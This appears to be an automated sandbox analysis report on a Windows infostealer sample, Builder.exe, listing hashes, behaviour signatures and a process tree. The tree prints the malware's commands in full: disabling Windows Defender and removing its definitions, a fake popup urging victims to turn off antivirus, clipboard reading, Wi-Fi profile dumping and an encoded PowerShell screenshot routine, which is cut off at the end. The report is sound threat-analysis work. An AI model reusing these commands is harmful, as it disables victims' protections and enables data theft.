Analysis
-
max time kernel
91s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-01-2025 18:12
Behavioral task
behavioral1
Sample
Builder.exe
Resource
win10ltsc2021-20250128-en
Behavioral task
behavioral2
Sample
Builder.exe
Resource
win11-20241007-en
General
-
Target
Builder.exe
-
Size
7.3MB
-
MD5
a215edd9d9788492b561858e44184bca
-
SHA1
77d8816ecce79f525c118687149e2f3b68dcb984
-
SHA256
7fbbefdae9adf0f81808b9decf48c08ba4a47293e80cd4855c083ab1f392c184
-
SHA512
64dfdf28e74a95af3cef3ad89b45d656bb49fba705665aad7878a397f18ae1c1a7e1aca2df466e80179f130b5350f0ac1eea26affe940742c2c42b8930f035ff
-
SSDEEP
196608:uuWYS6uOshoKMuIkhVastRL5Di3uq1D7mW:IYShOshouIkPftRL54DRX
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4796 powershell.exe 4936 powershell.exe 4948 powershell.exe 5876 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Builder.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1920 cmd.exe 3100 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3056 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe 5220 Builder.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 5 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4112 tasklist.exe 3520 tasklist.exe 5548 tasklist.exe 6048 tasklist.exe 2356 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 5504 cmd.exe -
resource yara_rule behavioral2/files/0x001900000002ab6e-21.dat upx behavioral2/memory/5220-25-0x00007FFB36520000-0x00007FFB36B09000-memory.dmp upx behavioral2/files/0x001900000002ab5d-27.dat upx behavioral2/files/0x001900000002ab6c-29.dat upx behavioral2/memory/5220-32-0x00007FFB40510000-0x00007FFB4051F000-memory.dmp upx behavioral2/memory/5220-30-0x00007FFB40470000-0x00007FFB40493000-memory.dmp upx behavioral2/files/0x001900000002ab6b-34.dat upx behavioral2/files/0x001900000002ab6d-35.dat upx behavioral2/files/0x001900000002ab71-38.dat upx behavioral2/files/0x001d00000002ab5c-41.dat upx behavioral2/files/0x001900000002ab68-48.dat upx behavioral2/files/0x001000000002ab67-47.dat upx behavioral2/files/0x001900000002ab64-46.dat upx behavioral2/files/0x001900000002ab63-45.dat upx behavioral2/files/0x001c00000002ab62-44.dat upx behavioral2/files/0x001900000002ab61-43.dat upx behavioral2/files/0x001900000002ab5e-42.dat upx behavioral2/files/0x001900000002ab73-40.dat upx behavioral2/files/0x001900000002ab72-39.dat upx behavioral2/memory/5220-54-0x00007FFB39D40000-0x00007FFB39D6D000-memory.dmp upx behavioral2/memory/5220-56-0x00007FFB3BD60000-0x00007FFB3BD79000-memory.dmp upx behavioral2/memory/5220-58-0x00007FFB39D10000-0x00007FFB39D33000-memory.dmp upx behavioral2/memory/5220-60-0x00007FFB363A0000-0x00007FFB36517000-memory.dmp upx behavioral2/memory/5220-62-0x00007FFB3B6B0000-0x00007FFB3B6C9000-memory.dmp upx behavioral2/memory/5220-64-0x00007FFB404D0000-0x00007FFB404DD000-memory.dmp upx behavioral2/memory/5220-66-0x00007FFB39CD0000-0x00007FFB39D03000-memory.dmp upx behavioral2/memory/5220-71-0x00007FFB36C20000-0x00007FFB36CED000-memory.dmp upx behavioral2/memory/5220-74-0x00007FFB40470000-0x00007FFB40493000-memory.dmp upx behavioral2/memory/5220-73-0x00007FFB33A10000-0x00007FFB33F30000-memory.dmp upx behavioral2/memory/5220-70-0x00007FFB36520000-0x00007FFB36B09000-memory.dmp upx behavioral2/memory/5220-76-0x00007FFB3B050000-0x00007FFB3B064000-memory.dmp upx behavioral2/memory/5220-78-0x00007FFB39D40000-0x00007FFB39D6D000-memory.dmp upx behavioral2/memory/5220-79-0x00007FFB39A40000-0x00007FFB39A4D000-memory.dmp upx behavioral2/memory/5220-82-0x00007FFB36280000-0x00007FFB3639C000-memory.dmp upx behavioral2/memory/5220-81-0x00007FFB3BD60000-0x00007FFB3BD79000-memory.dmp upx behavioral2/memory/5220-105-0x00007FFB39D10000-0x00007FFB39D33000-memory.dmp upx behavioral2/memory/5220-106-0x00007FFB363A0000-0x00007FFB36517000-memory.dmp upx behavioral2/memory/5220-192-0x00007FFB3B6B0000-0x00007FFB3B6C9000-memory.dmp upx behavioral2/memory/5220-251-0x00007FFB39CD0000-0x00007FFB39D03000-memory.dmp upx behavioral2/memory/5220-267-0x00007FFB36C20000-0x00007FFB36CED000-memory.dmp upx behavioral2/memory/5220-278-0x00007FFB33A10000-0x00007FFB33F30000-memory.dmp upx behavioral2/memory/5220-295-0x00007FFB363A0000-0x00007FFB36517000-memory.dmp upx behavioral2/memory/5220-289-0x00007FFB36520000-0x00007FFB36B09000-memory.dmp upx behavioral2/memory/5220-290-0x00007FFB40470000-0x00007FFB40493000-memory.dmp upx behavioral2/memory/5220-314-0x00007FFB36C20000-0x00007FFB36CED000-memory.dmp upx behavioral2/memory/5220-313-0x00007FFB39CD0000-0x00007FFB39D03000-memory.dmp upx behavioral2/memory/5220-312-0x00007FFB404D0000-0x00007FFB404DD000-memory.dmp upx behavioral2/memory/5220-311-0x00007FFB3B6B0000-0x00007FFB3B6C9000-memory.dmp upx behavioral2/memory/5220-310-0x00007FFB363A0000-0x00007FFB36517000-memory.dmp upx behavioral2/memory/5220-309-0x00007FFB39D10000-0x00007FFB39D33000-memory.dmp upx behavioral2/memory/5220-308-0x00007FFB3BD60000-0x00007FFB3BD79000-memory.dmp upx behavioral2/memory/5220-307-0x00007FFB39D40000-0x00007FFB39D6D000-memory.dmp upx behavioral2/memory/5220-306-0x00007FFB40510000-0x00007FFB4051F000-memory.dmp upx behavioral2/memory/5220-305-0x00007FFB40470000-0x00007FFB40493000-memory.dmp upx behavioral2/memory/5220-304-0x00007FFB36520000-0x00007FFB36B09000-memory.dmp upx behavioral2/memory/5220-318-0x00007FFB36280000-0x00007FFB3639C000-memory.dmp upx behavioral2/memory/5220-317-0x00007FFB39A40000-0x00007FFB39A4D000-memory.dmp upx behavioral2/memory/5220-316-0x00007FFB3B050000-0x00007FFB3B064000-memory.dmp upx behavioral2/memory/5220-319-0x00007FFB33A10000-0x00007FFB33F30000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1096 cmd.exe 2432 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3460 cmd.exe 5680 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5260 WMIC.exe 3960 WMIC.exe 456 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4904 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2432 PING.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4796 powershell.exe 4936 powershell.exe 4936 powershell.exe 4796 powershell.exe 3100 powershell.exe 3100 powershell.exe 3100 powershell.exe 3308 powershell.exe 3308 powershell.exe 3308 powershell.exe 4948 powershell.exe 4948 powershell.exe 5732 powershell.exe 5732 powershell.exe 5876 powershell.exe 5876 powershell.exe 6016 powershell.exe 6016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3520 tasklist.exe Token: SeIncreaseQuotaPrivilege 4468 WMIC.exe Token: SeSecurityPrivilege 4468 WMIC.exe Token: SeTakeOwnershipPrivilege 4468 WMIC.exe Token: SeLoadDriverPrivilege 4468 WMIC.exe Token: SeSystemProfilePrivilege 4468 WMIC.exe Token: SeSystemtimePrivilege 4468 WMIC.exe Token: SeProfSingleProcessPrivilege 4468 WMIC.exe Token: SeIncBasePriorityPrivilege 4468 WMIC.exe Token: SeCreatePagefilePrivilege 4468 WMIC.exe Token: SeBackupPrivilege 4468 WMIC.exe Token: SeRestorePrivilege 4468 WMIC.exe Token: SeShutdownPrivilege 4468 WMIC.exe Token: SeDebugPrivilege 4468 WMIC.exe Token: SeSystemEnvironmentPrivilege 4468 WMIC.exe Token: SeRemoteShutdownPrivilege 4468 WMIC.exe Token: SeUndockPrivilege 4468 WMIC.exe Token: SeManageVolumePrivilege 4468 WMIC.exe Token: 33 4468 WMIC.exe Token: 34 4468 WMIC.exe Token: 35 4468 WMIC.exe Token: 36 4468 WMIC.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeIncreaseQuotaPrivilege 4468 WMIC.exe Token: SeSecurityPrivilege 4468 WMIC.exe Token: SeTakeOwnershipPrivilege 4468 WMIC.exe Token: SeLoadDriverPrivilege 4468 WMIC.exe Token: SeSystemProfilePrivilege 4468 WMIC.exe Token: SeSystemtimePrivilege 4468 WMIC.exe Token: SeProfSingleProcessPrivilege 4468 WMIC.exe Token: SeIncBasePriorityPrivilege 4468 WMIC.exe Token: SeCreatePagefilePrivilege 4468 WMIC.exe Token: SeBackupPrivilege 4468 WMIC.exe Token: SeRestorePrivilege 4468 WMIC.exe Token: SeShutdownPrivilege 4468 WMIC.exe Token: SeDebugPrivilege 4468 WMIC.exe Token: SeSystemEnvironmentPrivilege 4468 WMIC.exe Token: SeRemoteShutdownPrivilege 4468 WMIC.exe Token: SeUndockPrivilege 4468 WMIC.exe Token: SeManageVolumePrivilege 4468 WMIC.exe Token: 33 4468 WMIC.exe Token: 34 4468 WMIC.exe Token: 35 4468 WMIC.exe Token: 36 4468 WMIC.exe Token: SeIncreaseQuotaPrivilege 5260 WMIC.exe Token: SeSecurityPrivilege 5260 WMIC.exe Token: SeTakeOwnershipPrivilege 5260 WMIC.exe Token: SeLoadDriverPrivilege 5260 WMIC.exe Token: SeSystemProfilePrivilege 5260 WMIC.exe Token: SeSystemtimePrivilege 5260 WMIC.exe Token: SeProfSingleProcessPrivilege 5260 WMIC.exe Token: SeIncBasePriorityPrivilege 5260 WMIC.exe Token: SeCreatePagefilePrivilege 5260 WMIC.exe Token: SeBackupPrivilege 5260 WMIC.exe Token: SeRestorePrivilege 5260 WMIC.exe Token: SeShutdownPrivilege 5260 WMIC.exe Token: SeDebugPrivilege 5260 WMIC.exe Token: SeSystemEnvironmentPrivilege 5260 WMIC.exe Token: SeRemoteShutdownPrivilege 5260 WMIC.exe Token: SeUndockPrivilege 5260 WMIC.exe Token: SeManageVolumePrivilege 5260 WMIC.exe Token: 33 5260 WMIC.exe Token: 34 5260 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5276 wrote to memory of 5220 5276 Builder.exe 77 PID 5276 wrote to memory of 5220 5276 Builder.exe 77 PID 5220 wrote to memory of 3096 5220 Builder.exe 78 PID 5220 wrote to memory of 3096 5220 Builder.exe 78 PID 5220 wrote to memory of 5632 5220 Builder.exe 79 PID 5220 wrote to memory of 5632 5220 Builder.exe 79 PID 5220 wrote to memory of 5676 5220 Builder.exe 80 PID 5220 wrote to memory of 5676 5220 Builder.exe 80 PID 5220 wrote to memory of 1160 5220 Builder.exe 82 PID 5220 wrote to memory of 1160 5220 Builder.exe 82 PID 3096 wrote to memory of 4796 3096 cmd.exe 86 PID 3096 wrote to memory of 4796 3096 cmd.exe 86 PID 5220 wrote to memory of 2288 5220 Builder.exe 88 PID 5220 wrote to memory of 2288 5220 Builder.exe 88 PID 5676 wrote to memory of 2988 5676 cmd.exe 87 PID 5676 wrote to memory of 2988 5676 cmd.exe 87 PID 1160 wrote to memory of 3520 1160 cmd.exe 90 PID 1160 wrote to memory of 3520 1160 cmd.exe 90 PID 5632 wrote to memory of 4936 5632 cmd.exe 91 PID 5632 wrote to memory of 4936 5632 cmd.exe 91 PID 2288 wrote to memory of 4468 2288 cmd.exe 92 PID 2288 wrote to memory of 4468 2288 cmd.exe 92 PID 5220 wrote to memory of 724 5220 Builder.exe 94 PID 5220 wrote to memory of 724 5220 Builder.exe 94 PID 724 wrote to memory of 4492 724 cmd.exe 96 PID 724 wrote to memory of 4492 724 cmd.exe 96 PID 5220 wrote to memory of 1632 5220 Builder.exe 97 PID 5220 wrote to memory of 1632 5220 Builder.exe 97 PID 1632 wrote to memory of 1368 1632 cmd.exe 99 PID 1632 wrote to memory of 1368 1632 cmd.exe 99 PID 5220 wrote to memory of 2244 5220 Builder.exe 100 PID 5220 wrote to memory of 2244 5220 Builder.exe 100 PID 2244 wrote to memory of 5260 2244 cmd.exe 102 PID 2244 wrote to memory of 5260 2244 cmd.exe 102 PID 5220 wrote to memory of 1336 5220 Builder.exe 103 PID 5220 wrote to memory of 1336 5220 Builder.exe 103 PID 1336 wrote to memory of 3960 1336 cmd.exe 105 PID 1336 wrote to memory of 3960 1336 cmd.exe 105 PID 5220 wrote to memory of 5504 5220 Builder.exe 106 PID 5220 wrote to memory of 5504 5220 Builder.exe 106 PID 5504 wrote to memory of 5544 5504 cmd.exe 108 PID 5504 wrote to memory of 5544 5504 cmd.exe 108 PID 5220 wrote to memory of 5740 5220 Builder.exe 109 PID 5220 wrote to memory of 5740 5220 Builder.exe 109 PID 5220 wrote to memory of 3256 5220 Builder.exe 110 PID 5220 wrote to memory of 3256 5220 Builder.exe 110 PID 5740 wrote to memory of 5548 5740 cmd.exe 113 PID 5740 wrote to memory of 5548 5740 cmd.exe 113 PID 5220 wrote to memory of 1100 5220 Builder.exe 114 PID 5220 wrote to memory of 1100 5220 Builder.exe 114 PID 5220 wrote to memory of 1920 5220 Builder.exe 115 PID 5220 wrote to memory of 1920 5220 Builder.exe 115 PID 3256 wrote to memory of 6048 3256 cmd.exe 116 PID 3256 wrote to memory of 6048 3256 cmd.exe 116 PID 5220 wrote to memory of 1404 5220 Builder.exe 119 PID 5220 wrote to memory of 1404 5220 Builder.exe 119 PID 5220 wrote to memory of 3172 5220 Builder.exe 121 PID 5220 wrote to memory of 3172 5220 Builder.exe 121 PID 5220 wrote to memory of 3460 5220 Builder.exe 123 PID 5220 wrote to memory of 3460 5220 Builder.exe 123 PID 1920 wrote to memory of 3100 1920 cmd.exe 125 PID 1920 wrote to memory of 3100 1920 cmd.exe 125 PID 1404 wrote to memory of 2356 1404 cmd.exe 126 PID 1404 wrote to memory of 2356 1404 cmd.exe 126 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 1424 attrib.exe 5688 attrib.exe 5544 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Builder.exe"C:\Users\Admin\AppData\Local\Temp\Builder.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5276 -
C:\Users\Admin\AppData\Local\Temp\Builder.exe"C:\Users\Admin\AppData\Local\Temp\Builder.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builder.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builder.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:5632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:5676 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()"4⤵PID:2988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:1368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:5260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Builder.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:5504 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Builder.exe"4⤵
- Views/modifies file attributes
PID:5544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5740 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:5548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:6048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:1100
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3172
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3460 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2016
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1244
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4A